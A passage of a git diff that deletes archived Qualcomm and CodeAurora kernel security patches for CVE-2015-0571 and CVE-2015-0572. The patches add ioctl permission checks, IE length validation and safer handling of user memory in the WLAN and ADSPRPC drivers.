diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0003.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0003.patch
deleted file mode 100644
index 9b0fcfa9..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0003.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 0e53a89bfe0dbb50e0dde9a6960d274386247cd9 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@qti.qualcomm.com>
-Date: Tue, 27 Oct 2015 23:17:10 +0530
-Subject: wlan:Check priviledge permission before processing SET_CHAR_GET_NONE
- IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_CHAR_GET_NONE IOCTLs, making
-sure user task has right permission to process the command.
-
-Change-Id: I7b060bcdc84f7016e8d301e994437a535533a260
-CRs-Fixed: 930935
----
- CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 668cd1d..610b61b 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -7216,6 +7216,12 @@ static int __iw_setchar_getnone(struct net_device *dev,
-     if (0 != ret)
-         return ret;
- 
-+    if (!capable(CAP_NET_ADMIN)){
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  FL("permission check failed"));
-+        return -EPERM;
-+    }
-+
-     /* helper function to get iwreq_data with compat handling. */
-     if (hdd_priv_get_data(&s_priv_data, wrqu)) {
-        return -EINVAL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0004.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0004.patch
deleted file mode 100644
index 7fea03a5..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0004.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 88ce639e7a0bba852f193b6f53b7ca1926a09b02 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@qti.qualcomm.com>
-Date: Tue, 27 Oct 2015 23:47:48 +0530
-Subject: wlan:Check priviledge permission before processing SET_PACKET_FILTER
- IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_PACKET_FILTER IOCTL, making
-sure user task has right permission to process the command.
-
-Change-Id: Ib49c3223eacdc90dfe0d45af1aff7c74518990df
-CRs-Fixed: 930937
----
- CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 610b61b..67ed8a3 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -10088,6 +10088,12 @@ static int __iw_set_packet_filter_params(struct net_device *dev,
- 
-     ENTER();
- 
-+    if (!capable(CAP_NET_ADMIN)) {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  FL("permission check failed"));
-+        return -EPERM;
-+    }
-+
-     hdd_ctx = WLAN_HDD_GET_CTX(pAdapter);
-     ret = wlan_hdd_validate_context(hdd_ctx);
-     if (0 != ret)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0005.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0005.patch
deleted file mode 100644
index d4a24982..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0005.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From 0858d21caf17d56f8d2353590c1ec245073222e0 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@qti.qualcomm.com>
-Date: Tue, 27 Oct 2015 23:37:46 +0530
-Subject: wlan:Check priviledge permission for SET_VAR_INTS_GETNONE IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_VAR_INTS_GETNONE, making
-sure user task has right permission to process the command.
-
-Change-Id: Icbdfe69c18c1ab3b75d63e046d5251307a794817
-CRs-Fixed: 930942
----
- CORE/HDD/src/wlan_hdd_wext.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 67ed8a3..27c1813 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -8916,6 +8916,11 @@ static int iw_hdd_set_var_ints_getnone(struct net_device *dev,
- 	int apps_args[MAX_VAR_ARGS] = {0};
- 	int ret, num_args;
- 
-+	if (!capable(CAP_NET_ADMIN)) {
-+		VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+			FL("permission check failed"));
-+		return -EPERM;
-+	}
- 	/* Helper function to get iwreq_data with compat handling. */
- 	if (hdd_priv_get_data(&u_priv_wrqu.data, wrqu))
- 		return -EINVAL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0006.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0006.patch
deleted file mode 100644
index 29bc5599..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0006.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 2905578424256be07e6b9d8c63bb83d40cc52a71 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@qti.qualcomm.com>
-Date: Wed, 28 Oct 2015 00:26:02 +0530
-Subject: wlan:Check priviledge permission for QCSAP_IOCTL_SETWPSIE
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing QCSAP_IOCTL_SETWPSIE IOCTL,
-making sure user task has right permission to process the command.
-
-Change-Id: Ie1c945afb0f109892beda66bab25647d70cc62d7
-CRs-Fixed: 930944
----
- CORE/HDD/src/wlan_hdd_hostapd.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index e4e1a63..52402ff 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -5130,6 +5130,12 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- 
-    ENTER();
- 
-+   if (!capable(CAP_NET_ADMIN)) {
-+       VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                FL("permission check failed"));
-+       return -EPERM;
-+   }
-+
-    hdd_ctx = WLAN_HDD_GET_CTX(pHostapdAdapter);
-    ret = wlan_hdd_validate_context(hdd_ctx);
-    if (0 != ret)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0007.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0007.patch
deleted file mode 100644
index c02c77cc..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0007.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From be62ecde85228b91c66fb047e27d25132f56bd0d Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@qti.qualcomm.com>
-Date: Wed, 28 Oct 2015 00:29:03 +0530
-Subject: wlan:Check priviledge permission for QCSAP_IOCTL_DISASSOC_STA
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing QCSAP_IOCTL_DISASSOC_STA IOCTL,
-making sure user task has right permission to process the command.
-
-Change-Id: I00919a56e93b8b49bce7a314b50f9f48039fbe6f
-CRs-Fixed: 930946
----
- CORE/HDD/src/wlan_hdd_hostapd.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index 52402ff..9a96d5e 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -4066,6 +4066,12 @@ static __iw_softap_disassoc_sta(struct net_device *dev,
- 
-     ENTER();
- 
-+    if (!capable(CAP_NET_ADMIN)) {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                 FL("permission check failed"));
-+        return -EPERM;
-+    }
-+
-     hdd_ctx = WLAN_HDD_GET_CTX(pHostapdAdapter);
-     ret = wlan_hdd_validate_context(hdd_ctx);
-     if (0 != ret)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0008.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0008.patch
deleted file mode 100644
index 266962e0..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0008.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From aaeeed43f9597631982835481c7cf2621f6455f0 Mon Sep 17 00:00:00 2001
-From: Hanumantha Reddy Pothula <c_hpothu@qti.qualcomm.com>
-Date: Wed, 28 Oct 2015 00:23:45 +0530
-Subject: wlan:Check priviledge permission for SET_THREE_INT_GET_NONE
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_THREE_INT_GET_NONE IOCTL,
-making sure user task has right permission to process the command.
-
-Change-Id: I3c695160d637ed87b04ccf3299985055a9791c4b
-CRs-Fixed: 930948
----
- CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index c1ba718..28a280b 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -7959,6 +7959,12 @@ static int __iw_set_three_ints_getnone(struct net_device *dev,
- 
-     ENTER();
- 
-+    if (!capable(CAP_NET_ADMIN)) {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  FL("permission check failed"));
-+        return -EPERM;
-+    }
-+
-     ret = wlan_hdd_validate_context(hdd_ctx);
-     if (0 != ret)
-         return ret;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0009.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0009.patch
deleted file mode 100644
index 1d9fd9b9..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0009.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 6642bccf3ed8cba176dee7d4bbc21fc4580efb7b Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@qti.qualcomm.com>
-Date: Tue, 27 Oct 2015 23:51:02 +0530
-Subject: wlan:Check priviledge permission for SET_BAND_CONFIG IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_BAND_CONFIG IOCTL, making
-sure user task has right permission to process the command.
-
-Change-Id: Ie8a36bfa07a7b21601364b27b3c4bc888a6a5b4e
-CRs-Fixed: 930952
----
- CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 27c1813..3240c90 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -10816,6 +10816,12 @@ static int __iw_set_band_config(struct net_device *dev,
-     if (0 != ret)
-         return ret;
- 
-+    if (!capable(CAP_NET_ADMIN)) {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  FL("permission check failed"));
-+        return -EPERM;
-+    }
-+
-     return hdd_setBand(dev, value[0]);
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0010.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0010.patch
deleted file mode 100644
index 44684fad..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0010.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 6665a9697b404acf4d2e7d52d9c2b19512c9b239 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@qti.qualcomm.com>
-Date: Tue, 27 Oct 2015 23:56:37 +0530
-Subject: wlan:Check priviledge permission for SET_POWER_PARAMS IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_POWER_PARAMS IOCTL, making
-sure user task has right permission to process the command.
-
-Change-Id: Ie930c9723ecbd54ae0e6bf6506815301e0387932
-CRs-Fixed: 930953
----
- CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 3240c90..b7448c3 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -10846,6 +10846,12 @@ static int __iw_set_power_params_priv(struct net_device *dev,
-   char *ptr;
- 
-   ENTER();
-+
-+  if (!capable(CAP_NET_ADMIN)) {
-+      VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                 FL("permission check failed"));
-+      return -EPERM;
-+  }
-   /* ODD number is used for set, copy data using copy_from_user */
-   ptr = mem_alloc_copy_from_user_helper(wrqu->data.pointer,
-                                         wrqu->data.length);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0011.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0011.patch
deleted file mode 100644
index e02a099e..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0011.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 9eeafd788f53cc37c169b299f91ca9c558b228f9 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@qti.qualcomm.com>
-Date: Tue, 27 Oct 2015 23:54:05 +0530
-Subject: wlan:Check priviledge permission for CLEAR_MCBC_FILTER IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing CLEAR_MCBC_FILTER IOCTL, making
-sure user task has right permission to process the command.
-
-Change-Id: I9b50fcc0eeb1c1eb3493eab573f4421b52f0ea9a
-CRs-Fixed: 930954
----
- CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index b7448c3..c1ba718 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -9458,6 +9458,12 @@ static int __iw_clear_dynamic_mcbc_filter(struct net_device *dev,
-     tpSirWlanSetRxpFilters wlanRxpFilterParam;
- 
-     ENTER();
-+
-+    if (!capable(CAP_NET_ADMIN)) {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                 FL("permission check failed"));
-+        return -EPERM;
-+    }
-     //Reset the filter to INI value as we have to clear the dynamic filter
-     pHddCtx->configuredMcastBcastFilter = pHddCtx->cfg_ini->mcastBcastFilterSetting;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0012.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0012.patch
deleted file mode 100644
index 46f616ef..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0012.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From 55bdc6d1c88a100dc4a71bf855b69db522c9b5b5 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@qca.qualcomm.com>
-Date: Tue, 27 Oct 2015 13:29:21 -0700
-Subject: qcacld-2.0: Add privilege check for QCSAP_IOCTL_WOWL_CONFIG_PTRN
-
-By convention Wireless Extension SET ioctls are supposed to be
-assigned even ioctl numbers. But in our WLAN driver some SET ioctls
-were assigned odd numbers. This means the kernel will fail to check,
-for those particular SET ioctls, whether or not the user has the right
-permission to do SET operations.  QCSAP_IOCTL_WOWL_CONFIG_PTRN is one
-such ioctl.
-
-Ideally we would renumber this ioctl to conform to the Wireless
-Extensions convention.  Unfortunately we don't know what userspace
-applications have this ioctl number hard-coded.  Hence, in the driver,
-before processing the QCSAP_IOCTL_WOWL_CONFIG_PTRN ioctl, make sure
-the user task has the right permission to execute the command.
-
-Change-Id: Id61c1ec8dbbe4bbec2b032e12ffcc6139bb78b14
-CRs-Fixed: 931127
----
- CORE/HDD/src/wlan_hdd_hostapd.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index 9a96d5e..270f5e1 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -2525,6 +2525,12 @@ static __iw_softap_wowl_config_pattern(struct net_device *dev,
-     hdd_adapter_t *pAdapter = (netdev_priv(dev));
-     struct iw_point s_priv_data;
- 
-+    if (!capable(CAP_NET_ADMIN)) {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  FL("permission check failed"));
-+        return -EPERM;
-+    }
-+
-     if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-     {
-         VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0013.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0013.patch
deleted file mode 100644
index 3fb62d56..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0013.patch
+++ /dev/null
@@ -1,105 +0,0 @@
-From fb9fb202c71547dba648c9b08d97645c6f42ca6e Mon Sep 17 00:00:00 2001
-From: Mahesh A Saptasagar <c_msapta@qti.qualcomm.com>
-Date: Wed, 28 Oct 2015 16:36:56 +0530
-Subject: qcacld 2.0: Validate WPA and RSN IE for valid length
-
-prima to qcacld-2.0 propagation
-
-Return failure to applications if genie ioctl is invoked to configure
-WPS/WPA/RSN IEs with arguments of improper length.
-
-Change-Id: I2e034ef9f2537922be35d46ce266e6b99dab7bb6
-CRs-Fixed: 931451
----
- CORE/HDD/src/wlan_hdd_wext.c | 34 +++++++++++++++++++++++++---------
- 1 file changed, 25 insertions(+), 9 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 28a280b..4349e6b 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -2613,8 +2613,8 @@ static int __iw_set_genie(struct net_device *dev, struct iw_request_info *info,
-             case IE_EID_VENDOR:
-                 if ((IE_LEN_SIZE+IE_EID_SIZE+IE_VENDOR_OUI_SIZE) > eLen) /* should have at least OUI */
-                 {
--                    kfree(base_genie);
--                    return -EINVAL;
-+                    ret = -EINVAL;
-+                    goto exit;
-                 }
- 
-                 if (0 == memcmp(&genie[0], "\x00\x50\xf2\x04", 4))
-@@ -2628,8 +2628,8 @@ static int __iw_set_genie(struct net_device *dev, struct iw_request_info *info,
-                        hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
-                                                       "Need bigger buffer space");
-                        VOS_ASSERT(0);
--                       kfree(base_genie);
--                       return -ENOMEM;
-+                       ret = -EINVAL;
-+                       goto exit;
-                     }
-                     // save to Additional IE ; it should be accumulated to handle WPS IE + other IE
-                     memcpy( pWextState->genIE.addIEdata + curGenIELen, genie - 2, eLen + 2);
-@@ -2638,6 +2638,14 @@ static int __iw_set_genie(struct net_device *dev, struct iw_request_info *info,
-                 else if (0 == memcmp(&genie[0], "\x00\x50\xf2", 3))
-                 {
-                     hddLog (VOS_TRACE_LEVEL_INFO, "%s Set WPA IE (len %d)",__func__, eLen + 2);
-+                    if ((eLen + 2) > (sizeof(pWextState->WPARSNIE)))
-+                    {
-+                       hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
-+                                                      "Need bigger buffer space");
-+                       ret = -EINVAL;
-+                       VOS_ASSERT(0);
-+                       goto exit;
-+                    }
-                     memset( pWextState->WPARSNIE, 0, MAX_WPA_RSN_IE_LEN );
-                     memcpy( pWextState->WPARSNIE, genie - 2, (eLen + 2));
-                     pWextState->roamProfile.pWPAReqIE = pWextState->WPARSNIE;
-@@ -2654,8 +2662,8 @@ static int __iw_set_genie(struct net_device *dev, struct iw_request_info *info,
-                        hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
-                                                       "Need bigger buffer space");
-                        VOS_ASSERT(0);
--                       kfree(base_genie);
--                       return -ENOMEM;
-+                       ret = -ENOMEM;
-+                       goto exit;
-                     }
-                     // save to Additional IE ; it should be accumulated to handle WPS IE + other IE
-                     memcpy( pWextState->genIE.addIEdata + curGenIELen, genie - 2, eLen + 2);
-@@ -2664,6 +2672,14 @@ static int __iw_set_genie(struct net_device *dev, struct iw_request_info *info,
-               break;
-          case DOT11F_EID_RSN:
-                 hddLog (LOG1, "%s Set RSN IE (len %d)",__func__, eLen+2);
-+                if ((eLen + 2) > (sizeof(pWextState->WPARSNIE)))
-+                {
-+                    hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
-+                                                  "Need bigger buffer space");
-+                    ret = -EINVAL;
-+                    VOS_ASSERT(0);
-+                    goto exit;
-+                }
-                 memset( pWextState->WPARSNIE, 0, MAX_WPA_RSN_IE_LEN );
-                 memcpy( pWextState->WPARSNIE, genie - 2, (eLen + 2));
-                 pWextState->roamProfile.pRSNReqIE = pWextState->WPARSNIE;
-@@ -2672,15 +2688,15 @@ static int __iw_set_genie(struct net_device *dev, struct iw_request_info *info,
- 
-          default:
-                 hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, elementId);
--            kfree(base_genie);
--            return 0;
-+                goto exit;
-     }
-         genie += eLen;
-         remLen -= eLen;
-     }
-+exit:
-     EXIT();
-     kfree(base_genie);
--    return 0;
-+    return ret;
- }
- 
- /**
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0572/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-0572/ANY/0001.patch
deleted file mode 100644
index 7682c495..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0572/ANY/0001.patch
+++ /dev/null
@@ -1,143 +0,0 @@
-From 34ad3d34fbff11b8e1210b9da0dac937fb956b61 Mon Sep 17 00:00:00 2001
-From: Sathish Ambley <sathishambley@codeaurora.org>
-Date: Wed, 10 Jun 2015 00:39:41 -0700
-Subject: msm: ADSPRPC: Do not access user memory directly
-
-The buffers being passed in the invocation are copied from user
-memory into the context using copy_from_user. Lookup the buffer
-pointers from the context where it was copied rather than directly
-accessing it from the user memory.
-
-Change-Id: Ief5a840f17f6287ebd48b4ae52facaccb271fab8
-Signed-off-by: Sathish Ambley <sathishambley@codeaurora.org>
----
- drivers/char/adsprpc.c        | 27 ++++++++++++++-------------
- drivers/char/adsprpc_compat.c | 15 +++++++--------
- 2 files changed, 21 insertions(+), 21 deletions(-)
-
-diff --git a/drivers/char/adsprpc.c b/drivers/char/adsprpc.c
-index a3d0b7f..1eec274 100644
---- a/drivers/char/adsprpc.c
-+++ b/drivers/char/adsprpc.c
-@@ -652,8 +652,7 @@ static int fastrpc_mmap_create(struct fastrpc_file *fl, int fd, uintptr_t va,
- static int fastrpc_mmap_create_physical(struct fastrpc_file *fl,
- 		struct fastrpc_ioctl_mmap *ud, struct fastrpc_mmap **ppmap);
- 
--static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx,
--			remote_arg_t *upra)
-+static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx)
- {
- 	remote_arg64_t *rpra;
- 	remote_arg_t *lpra = ctx->lpra;
-@@ -793,9 +792,9 @@ static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx,
- 	}
- 	inh = inbufs + outbufs;
- 	for (i = 0; i < REMOTE_SCALARS_INHANDLES(sc); i++) {
--		rpra[inh + i].buf.pv = ptr_to_uint64(upra[inh + i].buf.pv);
--		rpra[inh + i].buf.len = upra[inh + i].buf.len;
--		rpra[inh + i].h = upra[inh + i].h;
-+		rpra[inh + i].buf.pv = ptr_to_uint64(ctx->lpra[inh + i].buf.pv);
-+		rpra[inh + i].buf.len = ctx->lpra[inh + i].buf.len;
-+		rpra[inh + i].h = ctx->lpra[inh + i].h;
- 	}
- 	dmac_flush_range((char *)rpra, (char *)rpra + ctx->used);
-  bail:
-@@ -807,7 +806,7 @@ static int put_args(uint32_t kernel, struct smq_invoke_ctx *ctx,
- {
- 	uint32_t sc = ctx->sc;
- 	remote_arg64_t *rpra = ctx->rpra;
--	int i, inbufs, outbufs, outh;
-+	int i, inbufs, outbufs, outh, num;
- 	int err = 0;
- 
- 	inbufs = REMOTE_SCALARS_INBUFS(sc);
-@@ -815,7 +814,7 @@ static int put_args(uint32_t kernel, struct smq_invoke_ctx *ctx,
- 	for (i = inbufs; i < inbufs + outbufs; ++i) {
- 		if (!ctx->maps[i]) {
- 			K_COPY_TO_USER(err, kernel,
--				upra[i].buf.pv,
-+				ctx->lpra[i].buf.pv,
- 				uint64_to_ptr(rpra[i].buf.pv),
- 				rpra[i].buf.len);
- 			if (err)
-@@ -825,11 +824,13 @@ static int put_args(uint32_t kernel, struct smq_invoke_ctx *ctx,
- 			ctx->maps[i] = 0;
- 		}
- 	}
--	outh = inbufs + outbufs + REMOTE_SCALARS_INHANDLES(sc);
--	for (i = 0; i < REMOTE_SCALARS_OUTHANDLES(sc); i++) {
--		upra[outh + i].buf.pv = uint64_to_ptr(rpra[outh + i].buf.pv);
--		upra[outh + i].buf.len = rpra[outh + i].buf.len;
--		upra[outh + i].h = rpra[outh + i].h;
-+	num = REMOTE_SCALARS_OUTHANDLES(sc);
-+	if (num) {
-+		outh = inbufs + outbufs + REMOTE_SCALARS_INHANDLES(sc);
-+		K_COPY_TO_USER(err, kernel, &upra[outh], &ctx->lpra[outh],
-+				num * sizeof(*ctx->lpra));
-+		if (err)
-+			goto bail;
- 	}
-  bail:
- 	return err;
-@@ -992,7 +993,7 @@ static int fastrpc_internal_invoke(struct fastrpc_file *fl, uint32_t mode,
- 		goto bail;
- 
- 	if (REMOTE_SCALARS_LENGTH(ctx->sc)) {
--		VERIFY(err, 0 == get_args(kernel, ctx, invoke->pra));
-+		VERIFY(err, 0 == get_args(kernel, ctx));
- 		if (err)
- 			goto bail;
- 	}
-diff --git a/drivers/char/adsprpc_compat.c b/drivers/char/adsprpc_compat.c
-index 2956702..ee324dc 100644
---- a/drivers/char/adsprpc_compat.c
-+++ b/drivers/char/adsprpc_compat.c
-@@ -98,8 +98,9 @@ static int compat_get_fastrpc_ioctl_invoke(
- 	if (err)
- 		return -EFAULT;
- 
--	inv->inv.pra = (union remote_arg *)(inv + 1);
--	err = put_user(sc, &inv->inv.sc);
-+	pra = (union remote_arg *)(inv + 1);
-+	err = put_user(pra, &inv->inv.pra);
-+	err |= put_user(sc, &inv->inv.sc);
- 	err |= get_user(u, &inv32->inv.handle);
- 	err |= put_user(u, &inv->inv.handle);
- 	err |= get_user(p, &inv32->inv.pra);
-@@ -107,12 +108,11 @@ static int compat_get_fastrpc_ioctl_invoke(
- 		return err;
- 
- 	pra32 = compat_ptr(p);
--	pra = inv->inv.pra;
-+	pra = (union remote_arg *)(inv + 1);
- 	num = REMOTE_SCALARS_INBUFS(sc) + REMOTE_SCALARS_OUTBUFS(sc);
- 	for (j = 0; j < num; j++) {
- 		err |= get_user(p, &pra32[j].buf.pv);
